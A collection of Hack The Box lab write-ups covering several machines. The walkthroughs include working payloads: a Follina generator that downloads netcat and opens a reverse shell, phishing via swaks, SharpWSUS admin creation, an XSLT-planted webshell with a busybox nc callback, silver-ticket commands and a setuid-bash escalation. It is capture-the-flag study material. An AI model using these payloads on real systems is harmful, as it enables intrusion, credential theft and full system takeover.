preprod-payroll

I used gobuster to enumerate the endpoints. Since this is a pre-production subdomain, it's LIKELY to still contain debug functionalities of some sorts.

/users.php sounds interesting!

I then checked out the other endpoints:

But I couldn't do anything in either of them. I know that there's a /database however, meaning some sort of SQL commands get used. Maybe there's a SQLi here?

SQLi testing

I copied the initial request and used it with sqlmap to bruteforce the db:

It worked!

I found the creds down below:

Administrator
SuperGucciRainbowCake

I could now use these creds to login:

LFI

I tried out reading /etc/passwd using the URL but that didn't work:

This didn't seem to work so I tried my next trick to get the PHP page source:

php://filter/read=convert.base64-encode/resource=users

I then used the following to decode the base64 encoding:

The above gave us the file that we should look into, so I went ahead and read and decoded it:

This gave us a set of creds.

remo
TrulyImpossiblePasswordLmao123

However this would not give us access to ssh:

I tried out port 25 but got nowhere either.

ffuf - discovering preprod-marketing

Instead I used ffuf to discover yet another subdomain called preprod-marketing as follows:

preprod-marketing

I head on over to the webpage and am greeted with this landing page.

Here we find yet again a possible LFI vulnerability:

Even More LFI

I was able to retrieve the /etc/passwd file contents as follows:

Here we find the user michael. It is possible that the passwords are reused.

Unfortunately they aren't. However we can easily grab michael's id_rsa:

Foothold

SSH as michael

user.txt

Privilege Escalation

fail2ban

Checking sudo -l we notice the following:

[!quote]+ In Linux, fail2ban is mostly used to protect the SSH service. If the daemon detects several unsuccessful ssh login attempts, it executes a command that blocks the IP address. So misconfigurations can lead to privilege escalation.

I used the github link and read the instructions:

I then started up the exploit:

After waiting for roughly 100 seconds we become root:

root.txt

HTB-Outdated

Maxim Andrei Koltypin — Sat, 27 Sep 2025 00:00:00 GMT

Scope:
10.10.11.175

Recon

Nmap

sudo nmap -sV -sC -sT -p- outdated.htb -T5 --min-rate=5000 -vvvv -Pn

PORT      STATE SERVICE       REASON  VERSION
25/tcp    open  smtp          syn-ack hMailServer smtpd
| smtp-commands: mail.outdated.htb, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
53/tcp    open  domain        syn-ack Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2025-09-27 14:00:55Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
3269/tcp  open  ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.outdated.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC.outdated.htb
| Issuer: commonName=outdated-DC-CA/domainComponent=outdated
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8530/tcp  open  http          syn-ack Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: Site doesnt have a title.
|_http-server-header: Microsoft-IIS/10.0
8531/tcp  open  unknown       syn-ack
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
49689/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49690/tcp open  msrpc         syn-ack Microsoft Windows RPC
49901/tcp open  msrpc         syn-ack Microsoft Windows RPC
58694/tcp open  msrpc         syn-ack Microsoft Windows RPC
58712/tcp open  msrpc         syn-ack Microsoft Windows RPC

There's a web server open on 8530 and smtp seems to be open as well. Furthermore this seems to be a Domain Controller inside the outdated.htb domain called DC.outdated.htb.

I also noticed the mail.outdated.htb subdomain present as mentioned by smtp.

88/TCP - Kerberos

Kerbrute

I started off by enumerating any and all usernames inside the domain using the statistically-likely-usernames repo:

From this I went ahead and made a users.txt list for further password spraying.

sflowers
Administrator
Guest
client

445/TCP - SMB

netexec - password spray

By using this user list I went ahead and sprayed it against the DC:

We got a valid match!

client
sflowers

netexec - enum

I then went ahead and started enumerating what sort of access this user had:

Seems like we can't enumerate the shares but we do have access to ldap.

Enum4Linux-ng

Since we have a valid set we can use it with enum4linux-ng to enumerate the DC:

Further down we find the network shares present:

Since this script told us that authentication with blank usernames and password is allowed we might just do that:

There's one file present inside the Shares share which we can read and access:

Let's download the file and check it out.

This looks really promising!

:::note The print spooler service being on could result in an easy PrivEsc further on. :::

We also get an email from this.

itsupport@outdated.htb

Exploitation

CVE-2022-30190

I started digging into this one:

This led me to another blog post

So naturally I looked it up on github.

We can use the following gihub repo for reference by John Hammond:

Let's check out how to run this:

I moved the two files over to my directory and got to work:

Since the follina.py script is quite extensive we can instead narrow it down just to the following:

#!/usr/bin/env python3

import base64
import random
import string
import sys

if len(sys.argv) > 1:
    command = sys.argv[1]
else:
    command = "IWR http://10.10.14.7/nc64.exe -outfile C:\\programdata\\nc64.exe; C:\\programdata\\nc64.exe 10.10.14.7 443 -e cmd"

base64_payload = base64.b64encode(command.encode("utf-8")).decode("utf-8")

# Slap together a unique MS-MSDT payload that is over 4096 bytes at minimum
html_payload = f"""<script>location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \\"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'{base64_payload}'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\\""; //"""
html_payload += (
    "".join([random.choice(string.ascii_lowercase) for _ in range(4096)])
    + "\n</script>"
)

print(html_payload)

We save it and run it and save the output to an .html file:

We can then set it up.

Phishing for access

We need the following for the payload to fire:

# Swaks command
sudo swaks -t itsupport@outdated.htb --from tester@test.htb --server 10.10.11.175 --body "http://10.10.14.7/test_file.html" --header "Subject:Internal Web App" --suppress-data

# Python server
http 80

# Listener
rlwrap nc -lvnp 443

Upon running and waiting for a short while we get a response:

Foothold

Shell as btables

Afterwards I created another reverse shell to penelope in order to get a more stable shell using Powershell #3 (Base64) from RevShells.

Right away I noticed that I landed inside either the internal network or a HyperV container, and not inside the actual external machine:

Nevertheless I enumerated the user:

We find a valid credentials set which we might be able to use later on:

btables@outdated.htb
GHKKb7GEHcccdCT8tQV2QwL3

BloodHound

Time to do some enum.

It seems we are the only ones with sflowers on this domain as regular users, let's see if we can get an edge over them.

I then went ahead and transfered the .zip file over to kali.

Let's get to graphing.

As expected, we can easily own sflowers in order to achieve full access over the domain.

Shadow Credentials - AddKeyCredentialLink

As per SpecterOps:

:::quote Writing to this property allows an attacker to create “Shadow Credentials” on the object and authenticate as the principal using kerberos PKINIT. :::

We can abuse this permission using pywhisker:

We can't use this one yet since we don't have valid creds.

:::note For reference, I tried using the previously found credentials but they didn't work:

:::

This meant that instead I'd have to download over the Windows version:

Instead of building the .exe executable I downloaded over the .ps1 module from here:

We can run it as follows:

Invoke-Whisker -command "add /target:sflowers"

Upon running we see this output:

Let's upload rubeus.exe:

I copy pasted the outputted command and let it run, and all the way at the bottom we see the NTLM hash:

Lateral Movement as sflowers

We can move to sflowers now:

Now that we're in we should do some digging.

It looks like the other network was indeed inside a Hyper-V instance.

user.txt

Privilege Escalation

SharpWSUS

Checking back inside BloodHound we notice that we're part of the WSUS Administrators group:

We can exploit this group membership by using SharpWSUS:

Namely we can exploit it using the following command to create a psexec instance:

SharpWSUS.exe create /payload:"C:\Users\ben\Documents\pk\psexec.exe" /args:"-accepteula -s -d cmd.exe /c \"net user WSUSDemo Password123! /add && net localgroup administrators WSUSDemo /add\"" /title:"WSUSDemo"

I will yet again use this script instead of building the .exe version.

We can test if it works:

Next up we need to download over the psexec.exe binary:

I download the zip and transfer the binary I need:

Let's chain it together.

Invoke-SharpWSUS create /payload:'C:\Users\sflowers\psexec.exe' /args:'-accepteula' -s -d cmd.exe /c \'net user tester Password123! /add && net localgroup Administrators tester /add\' /title:'Testing'

Invoke-SharpWSUS approve /updateid:2c42b515-101b-4c18-ab80-be3688d57798 /computername:dc.outdated.htb /groupname:"Test"

Invoke-SharpWSUS check /updateid:3c71320a-edbe-431f-9c71-e82515ceb8b4 /computername:dc.outdated.htb

:::fail This ended up soft failing and did not create a user, so instead I opted for a reverse shell.

:::

I instead uploaded nc.exe and created a reverse shell that way:

Invoke-SharpWSUS create /payload:"C:\Users\sflowers\psexec.exe" /args:"-accepteula -s -d c:\Users\sflowers\nc.exe -e cmd.exe 10.10.14.7 443" /title:"Test5"

Afterwards we use the approve command:

Invoke-SharpWSUS approve /updateid:d68ae9a7-913a-415e-881f-e6d3a7272d58 /computername:dc.outdated.htb /groupname:"Test5"

The result is a SYSTEM shell:

:::warning The above commands may fail or just not execute, keep trying and it will work eventually. :::

root.txt

HTB-Planning

Maxim Andrei Koltypin — Tue, 07 Oct 2025 00:00:00 GMT

Scope:
10.10.11.68

Creds:
admin / 0D5oT70Fq13EvB5r

Recon

Nmap

sudo nmap -sC -sV -sT -vvvv -p- -T5 --min-rate=5000 -Pn planning.htb

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack nginx 1.24.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-title: Edukate - Online Education Website
|_http-server-header: nginx/1.24.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

No easy win.

80/TCP - HTTP

I ran a gobuster scan:

I then tried creating wordlists out of the found instructors, hoping that I could brute force it with the provided password.

None of these matched however:

Vhost

I then started enumerating vhosts using ffuf:

I went ahead and added it to my /etc/hosts:

I went ahead and input the creds and got in:

PoC

I then searched up whether there was any RCE exploit for the Grafana v11.0 version:

While this looked promising, I was not done yet.

By using the env command however I was able to find some juicy creds:

enzo
RioTecRANDEntANT!

Success!

Foothold

Shell as enzo

Time to get user.txt

user.txt

I then tried an easy win but unfortunately it didn't work:

Privilege Escalation

Enumeration

I downloaded over linpeas.sh and started enumerating:

Well that sucks.

Let's check the last one out.

Local Port Forward

I use the following command on ssh to port forward so I can access the 8000 port.

I use the found creds:

And I'm in.

I create a new cron job:

I start a listener and click on Run now:

root.txt

HTB-Signed

Maxim Andrei Koltypin — Thu, 16 Oct 2025 00:00:00 GMT

Scope:
10.10.11.90

Credentials:
scott
Sm230#C5NatH

Recon

Nmap

sudo nmap -sC -sV -sT -p- -Pn -T5 -vvvv --min-rate=5000 10.10.11.90

PORT     STATE SERVICE  REASON  VERSION
1433/tcp open  ms-sql-s syn-ack Microsoft SQL Server 2022 16.00.1000.00; RTM
|_ssl-date: 2025-10-16T07:20:52+00:00; 0s from scanner time.
| ms-sql-ntlm-info: 
|   10.10.11.90:1433: 
|     Target_Name: SIGNED
|     NetBIOS_Domain_Name: SIGNED
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: SIGNED.HTB
|     DNS_Computer_Name: DC01.SIGNED.HTB
|     DNS_Tree_Name: SIGNED.HTB
|_    Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| ms-sql-info: 
|   10.10.11.90:1433: 
|     Version: 
|       name: Microsoft SQL Server 2022 RTM
|       number: 16.00.1000.00
|       Product: Microsoft SQL Server 2022
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433

Host script results:
|_clock-skew: mean: 0s, deviation: 0s, median: 0s

1433/TCP - MSSQL

Using the given credentials we are able to login using impacket:

We quickly find out that we have insufficient privs:

Let's start off by enumerating the db's first:

Our user can't impersonate anyone else:

metasploit

In order to automate the process we can use msfconsole instead with the following module:

Funny enough the module tells us xp_cmdshell is in fact enabled

We find another service account:

I then used another module to enumerate all domain users since it seemed domain-linked:

XP_Dirtree Hash Stealing

Using the following command, in combination with responder we can steal the hash of mssqlsvc.

xp_dirtree \\10.10.14.4\test

Using john we can easily crack the hash:

mssqlsvc
purPLE9795!@

Using impacket we can now log in with this user:

Unfortunately we still can not execute commands freely.

Foothold

Silver Ticket

What we can do however is craft up a silver ticket. We'll need the following for this:

SPN password hash
Domain SID
Target SPN

We can find the SID

Since this isn't human readable I generated a python script using AI which I then used to make it readable:

#!/usr/bin/env python3
"""
Convert SQL/varbinary-style SIDs (e.g. b'0105000000...') or hex strings into the
human-readable Windows SID form: S-<revision>-<identifier-authority>-<subauth>-...

Usage (CLI):
    python3 sid_parse.py "b'0105000000000005150000005b7bb0f398aa2245ad4a1ca451040000'"

Or feed plain hex:
    python3 sid_parse.py 0105000000000005150000005b7bb0f398aa2245ad4a1ca451040000

Or import:
    from sid_parse import parse_sid, domain_sid, rid_from_sid
"""
import sys
import re
from typing import Tuple, List


def _normalize_input(s: str) -> bytes:
    """
    Accepts:
      - "b'01050000...'"
      - "0x01050000..."
      - "01050000..."
      - raw bytes representation (not typical from SQL)
    Returns bytes interpreted from hex.
    """
    if isinstance(s, bytes):
        return s

    s = s.strip()

    # SQL output often looks like: b'0105000000000005...'
    m = re.match(r"^b'([0-9a-fA-F]+)'\s*$", s)
    if m:
        hexstr = m.group(1)
        return bytes.fromhex(hexstr)

    # Remove potential 0x prefix
    if s.startswith("0x") or s.startswith("0X"):
        s = s[2:]

    # If it's plain printable hex (even length), use it
    if re.fullmatch(r"[0-9a-fA-F]+", s) and len(s) % 2 == 0:
        return bytes.fromhex(s)

    # Last resort: try to remove non-hex characters and decode
    cleaned = re.sub(r"[^0-9a-fA-F]", "", s)
    if len(cleaned) % 2 == 1:
        raise ValueError("Hex string has odd length after cleaning.")
    return bytes.fromhex(cleaned)


def parse_sid(input_value: str) -> str:
    """
    Parse the binary SID and return the textual SID e.g. S-1-5-21-...
    Accepts SQL varbinary-like strings and plain hex strings.
    """
    b = _normalize_input(input_value)
    if len(b) < 8:
        raise ValueError("Binary SID too short.")

    rev = b[0]
    sub_count = b[1]
    id_auth = int.from_bytes(b[2:8], "big")

    # Validate length
    expected_len = 8 + (4 * sub_count)
    if len(b) < expected_len:
        raise ValueError(f"Binary SID shorter than expected for {sub_count} subauthorities.")

    subs: List[int] = []
    offset = 8
    for i in range(sub_count):
        sub = int.from_bytes(b[offset:offset + 4], "little", signed=False)
        subs.append(sub)
        offset += 4

    sid_parts = ["S", str(rev), str(id_auth)] + [str(x) for x in subs]
    return "-".join(sid_parts)


def domain_sid(sid_text: str) -> str:
    """
    Return the domain SID (everything except the last RID).
    Example:
      input:  S-1-5-21-4088429403-1159899800-2753317549-1105
      output: S-1-5-21-4088429403-1159899800-2753317549
    """
    parts = sid_text.split("-")
    if len(parts) < 4:
        raise ValueError("SID format unexpected.")
    # remove last element (RID)
    return "-".join(parts[:-1])


def rid_from_sid(sid_text: str) -> str:
    parts = sid_text.split("-")
    if len(parts) < 4:
        raise ValueError("SID format unexpected.")
    return parts[-1]


def _cli_main(argv):
    if len(argv) < 2:
        print("Usage: sid_parse.py <hex-sid-or-SQL-b'...'> [more values...]")
        sys.exit(2)

    for token in argv[1:]:
        try:
            sid = parse_sid(token)
        except Exception as e:
            print(f"[ERROR] Could not parse '{token}': {e}")
            continue

        dom = domain_sid(sid)
        rid = rid_from_sid(sid)
        print(f"Input: {token}")
        print(f" SID : {sid}")
        print(f" DOM : {dom}")
        print(f" RID : {rid}")
        print("-" * 60)


if __name__ == "__main__":
    _cli_main(sys.argv)

This worked like a charm when testing the IT group:

ticketer

Using this knowledge we can use impacket-ticketer to create a silver ticket.

impacket-ticketer -nthash <controledSPNUserNT> -domain-sid <targetdomainSID> -domain <targetDomain> -spn <SPN service> -user-id <impersonateuserSID> -groups <impersonateGroup> <impersonateUsername>

To form the nthash we can use the following method:

impacket-ticketer -nthash ef699384c3285c54128a3ee1ddb1a0cc -domain-sid 'S-1-5-21-4088429403-1159899800-2753317549' -domain signed.htb -spn mssql/dc01.signed.htb -groups 1105 IT

Now we can save the ticket:

Using the forged ticket we can now login as the administrator account:

Reverse Shell as mssqlsvc

Using the following commands we get ourselves a reverse shell:

EXECUTE sp_configure 'show advanced options', 1; RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXECUTE xp_cmdshell '<cmd>'

user.txt

Privilege Escalation

File Read - UNINTENDED way

:::warning While this is the UNINTENDED way according to the box creator, this still works and also shows that the target is vulnerable to this attack:

:::

We find the user SID

Having this knowledge we can use ticketer again:

impacket-ticketer -nthash ef699384c3285c54128a3ee1ddb1a0cc -domain-sid 'S-1-5-21-4088429403-1159899800-2753317549' -domain signed.htb -spn mssql/dc01.signed.htb -groups 1105,512,519 -user-id 1103 mssqlsvc

Using the above command we have created a ticket where we impersonate ourselves as an Administrative account. This way we can achieve file read:

While this didn't work, the following did:

HTB-Horizontall

Maxim Andrei Koltypin — Sat, 25 Oct 2025 00:00:00 GMT

Scope:
10.10.11.105

Recon

Nmap

sudo nmap -sC -sV -sT -p- -vvvv -T5 --min-rate=5000 -Pn horizontall.htb

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack nginx 1.14.0 (Ubuntu)
|_http-title: horizontall
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-favicon: Unknown favicon MD5: 1BA2AE710D927F13D483FD5D1E548C9B
| http-methods: 
|_  Supported Methods: GET HEAD
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

80/TCP - HTTP

It looks like a static site.

I ran a gobuster scan but found nothing useful:

I did find some obfuscated js code in the source code that I ran in prettier.io:

Going all the way down I noticed the following which looked like a vhost:

api-prod

I added the vhost and started enumerating the host:

I checked the response in caido since the page was empty:

I headed over to the endpoint that I'd found earlier:

I then used gobuster to enumerate the endpoints:

Exploitation

CVE-2019-19609

I searched for relevant exploits and found an Unauthenticated RCE which could be big.

I downloaded the exploit from exploit-db and tried it out:

Once I had achieved RCE I ran the following payload to achieve a foothold:

Foothold

Shell as strapi

I noticed one other user present on the target:

I went ahead and read the user flag right away.

user.txt

Other than that I had no permissions over any files or directories in developer's /home directory.

Enumeration

I transferred over linpeas.sh and got to work:

Other than that I also found the credentials for developer:

developer
#J!:F9Zt2u

While we couldn't use these creds to su, we couldn't access mysql with them either.

Privilege Escalation

pwnkit

The priv esc was actually rather simple, we indeed just had to run pwnkit.py:

root.txt

HTB-TwoMillion

Maxim Andrei Koltypin — Sat, 25 Oct 2025 00:00:00 GMT

Scope:
10.10.11.221

Recon

Nmap

sudo nmap -sC -sV -sT -p- -vvvv -T5 --min-rate=5000 -Pn 2million.htb

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack nginx
| http-methods: 
|_  Supported Methods: GET
|_http-favicon: Unknown favicon MD5: 20E95ACF205EBFDCB6D634B7440B0CEE
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: Hack The Box :: Penetration Testing Labs
|_http-trane-info: Problem with XML parsing of /evox/about
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

80/TCP - HTTP

I checked out wappalyzer to learn more about the tech stack:

gobuster

Time for some directory enum.

I noticed an /api endpoint but it gave a 401 code so I couldn't access it (yet). Instead I checked out the /invite endpoint.

I checked out the source code and noticed the following:

I checked out the inviteapi.min.js code:

This looked like obfuscated js code, let's unpack it.

Exploitation

JavaScript Deobfuscation

For this I used unPacker:

function verifyInviteCode(code)
	{
	var formData=
		{
		"code":code
	};
	$.ajax(
		{
		type:"POST",dataType:"json",data:formData,url:'/api/v1/invite/verify',success:function(response)
			{
			console.log(response)
		}
		,error:function(response)
			{
			console.log(response)
		}
	}
	)
}
function makeInviteCode()
	{
	$.ajax(
		{
		type:"POST",dataType:"json",url:'/api/v1/invite/how/to/generate',success:function(response)
			{
			console.log(response)
		}
		,error:function(response)
			{
			console.log(response)
		}
	}
	)
}

This looks interesting, we can analyse the api call through caido:

It says the encryption type is ROT13 which is easily decoded.

We follow the instructions:

This time we get no hint but can clearly see that it's base64 encoded.

By entering this code we can access the /register endpoint:

I then registered and tried logging in:

Most of the tabs are static but some are still interactive:

I didn't find anything useful here for now.

API testing

Now that I had access I went on to test if I could access the /api endpoint:

Especially this setting looks promising:

We might be able to use this in order to escalate privileges.

I received an error about the content type so let's add the application/json in the headers.

We need to add the email.

Now it tells us to add is_admin so I added a 1 which indicates true:

It returns a 200 which means it worked!

Checking the GET request returns true meaning we successfully changed the user to an admin.

Next up I tried playing around with the POST request:

This request directly interacts with the backend and generates a vpn pack, we can try to inject commands here.

Command Injection

No response but it did give us a 200, let's test it further. In case the backend is executing a bash command we can try commenting out other options and/or commands by using #:

Foothold

Shell as www-data

Using the found Command Injection vulnerability we can get a reverse shell:

I then enumerated the current directory where I found cleartext credentials in the .env file:

admin
SuperDuperPass123

MySQL

Using the found creds we can log into mysql:

I tried cracking these but neither worked. Time for some enum.

Lateral Movement to admin

I enumerated the users:

I then tried the found password for password reuse:

I then started checking the environment:

user.txt

Enumeration

I download over linpeas and during enum found this:

I found this content inside:

From: ch4p <ch4p@2million.htb>
To: admin <admin@2million.htb>
Cc: g0blin <g0blin@2million.htb>
Subject: Urgent: Patch System OS
Date: Tue, 1 June 2023 10:45:22 -0700
Message-ID: <9876543210@2million.htb>
X-Mailer: ThunderMail Pro 5.2

Hey admin,

I'm know you're working as fast as you can to do the DB migration. While we're partially down, can you also upgrade the OS on our web host? There have been a few serious Linux kernel CVEs already this year. That one in OverlayFS / FUSE looks nasty. We can't get popped by that.

HTB Godfather

I did some searching and found a CVE:

Privilege Escalation

CVE-2023-0386

I did some digging on github:

I transferred the files to the target and executed the commands:

We can then easily exploit it:

root.txt

HTB-Conversor

Maxim Andrei Koltypin — Sun, 26 Oct 2025 00:00:00 GMT

import PasswordProtect from "~/components/PasswordProtect.client";

Scope:
10.10.11.92

Recon

Nmap

sudo nmap -sC -sV -sT -p- -vvvv -T5 --min-rate=5000 -Pn conversor.htb 

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack Apache httpd 2.4.52
| http-title: Login
|_Requested resource was /login
| http-methods: 
|_  Supported Methods: GET HEAD OPTIONS
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

80/TCP - HTTP

Using default admin - admin credentials I was able to log in:

We notice that it's some sort of File Upload Attack involving xml and xslt files.

I also noticed the JWT session cookie:

Before diving deeper into it I did a directory enum first:

I went over to the /about page:

I downloaded the source code and took a look at it:

What was odd is that the password field was just being saved as TEXT in the users.db:

Source Code analysis

By skimming through the source code we find that the backend is running on Flask:

We find multiple interesting finds like the app.secret.key:

The DB_PATH:

Further down we see the /login page functionality:

Lastly we find the /convert logic as well as how to view the files:

XXE - FAIL

So I went ahead and tested the upload functionality:

I then went ahead and uploaded this together with the sample xslt file:

So naturally I tried to achieve Local File Read by using the following files:

This however gave me the following error:

Unfortunately this didn't work so I had to look further.

XSLT Injection

I then referred to the following repo:

Checking out the install.md file which is already present in the source code we find this:

That means that we now know the path to write to.

Exploitation

RCE as www-data

I tried many payloads but in the end none worked. So instead I opted for uploading a webshell first:

Upload webshell.xslt:

<?xml version="1.0" encoding="UTF-8"?>
<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet
  xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
  xmlns:exsl="http://exslt.org/common"
  extension-element-prefixes="exsl"
  version="1.0">
  <xsl:template match="/">
    <exsl:document href="/var/www/conversor.htb/scripts/shell.py" method="text"><![CDATA[#!/usr/bin/env python3
# Cron-driven webshell runner
# - reads /var/www/conversor.htb/static/cmd.txt
# - executes its contents (shell)
# - writes output to /var/www/conversor.htb/static/out.txt
# - clears cmd.txt to avoid re-run

import os, subprocess, traceback, time

CMD_FILE = "/var/www/conversor.htb/static/cmd.txt"
OUT_FILE = "/var/www/conversor.htb/static/out.txt"
TMP_FILE = "/tmp/shell_runner_tmp"

def write_out(data_bytes):
    try:
        with open(OUT_FILE, "wb") as f:
            f.write(data_bytes)
    except Exception as e:
        try:
            with open(OUT_FILE, "wb") as f:
                f.write(str(e).encode())
        except:
            pass

try:
    if os.path.exists(CMD_FILE):
        # read command (strip leading/trailing whitespace)
        try:
            with open(CMD_FILE, "r") as f:
                cmd = f.read().strip()
        except:
            cmd = ""
        if cmd:
            try:
                # run command via shell so pipes/etc. work
                p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
                out, _ = p.communicate(timeout=60)
                if out is None:
                    out = b''
            except Exception:
                out = traceback.format_exc().encode()
            # write output atomically
            try:
                with open(TMP_FILE, "wb") as t:
                    t.write(out)
                os.replace(TMP_FILE, OUT_FILE)
            except Exception:
                write_out(out)
            # clear command file to avoid re-execution
            try:
                open(CMD_FILE, "w").close()
            except:
                pass
except Exception:
    write_out(traceback.format_exc().encode())
]]></exsl:document>
    <xsl:text>done-writing-shell</xsl:text>
  </xsl:template>
</xsl:stylesheet>

Once that was uploaded I uploaded the following script:

Upload write_cmd.xslt:

<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet
  xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
  xmlns:exsl="http://exslt.org/common"
  extension-element-prefixes="exsl"
  version="1.0">
  <xsl:template match="/">
    <exsl:document href="/var/www/conversor.htb/static/cmd.txt" method="text"><![CDATA[id
]]></exsl:document>
    <xsl:text>done-writing-cmd</xsl:text>
  </xsl:template>
</xsl:stylesheet>

I then uploaded it and confirmed RCE:

Once I confirmed that it worked as I wanted I went ahead and uploaded the final version.

Upload modified version of write_cmd.xslt:

<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet
  xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
  xmlns:exsl="http://exslt.org/common"
  extension-element-prefixes="exsl"
  version="1.0">
  <xsl:template match="/">
    <exsl:document href="/var/www/conversor.htb/static/cmd.txt" method="text"><![CDATA[busybox nc 10.10.14.3 443 -e bash
]]></exsl:document>
    <xsl:text>done-writing-cmd</xsl:text>
  </xsl:template>
</xsl:stylesheet>

After a short while I got a hit:

Once I was in I checked the present users:

Enumeration

I started checking out the directory I landed in and found a populated users.db:

This is an easily crackable md5 hash:

SSH as fismathack

Using the found creds I logged in via ssh:

fismathack
Keepmesafeandwarm

user.txt

Privilege Escalation

needrestart

Using sudo -l I found this:

I wasn't familiar with this tool but it seemed to be non-default so I looked it up:

I started checking it out and it turns out we can execute files using the -c flag.

Since we can do this as root we can easily escalate privs.

echo 'system("chmod +s /bin/bash");' > root.sh
sudo /usr/sbin/needrestart -c root.sh

root.txt

</PasswordProtect>

HTB-Forge

Maxim Andrei Koltypin — Mon, 27 Oct 2025 00:00:00 GMT

Scope:
10.10.11.111

Recon

Nmap

sudo nmap -sC -sV -sT -p- -vvvv -T5 --min-rate=5000 -Pn forge.htb

PORT   STATE    SERVICE REASON      VERSION
22/tcp open     ssh     syn-ack     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open     http    syn-ack     Apache httpd 2.4.41
|_http-title: Gallery
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-methods: 
|_  Supported Methods: OPTIONS GET HEAD
Service Info: Host: 10.10.11.111; OS: Linux; CPE: cpe:/o:linux:linux_kernel

80/TCP - HTTP

We can directly upload an image:

I tried to include the /etc/passwd file but got this response:

This appears to be a SSRF vulnerability rather than a File Upload one, let's test it out.

SSRF

I notice that it shows python as the User-Agent meaning it's probably either Flask or Django running the application.

I analysed the request further:

I tried reading files but it's not supported:

I then tested the following method:

However when I tested this one I got a different response:

I tried to enumerate open ports this way to see whether there were any other open ones but got none other than 80:

ffuf -w ./ports.txt -u http://forge.htb/upload -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "url=http://0:FUZZ&remote=1" -fr 'An error occured!'

Anyhow, instead I used the following technique to bypass the localhost checker:

By simply adding one uppercase letter we were able to successfully bypass it:

We are able to retrieve the index page that the webserver is hosting. Problem is though that I still am unable to fetch any other files, so it's time to continue our enumeration.

admin.forge.htb

Using ffuf I found the admin vhost:

And now I understand where the SSRF part comes in.

I then checked the /announcements endpoint using the same technique:

user
heightofsecurity123!

We get a set of creds, as well as more info about the /upload endpoint.

Combining the information we've gathered we can go ahead fetch everything that's inside the ftp server:

user.txt

Foothold

Shell as user

Fetching id_rsa

Since we were able to read the user.txt file it's HIGHLY LIKELY that the ftp directory is inside the user's /home directory. Let's try to fetch the ssh id_rsa key.

In order to understand whom the key belonged to I read the /etc/passwd file:

I thus captured the id_rsa and logged in with it:

Privilege Escalation

remote-manage

Using sudo -l I found out that I could run the following binary as root:

Exploitation

I went ahead and tried it out:

From another terminal I was able to execute some commands:

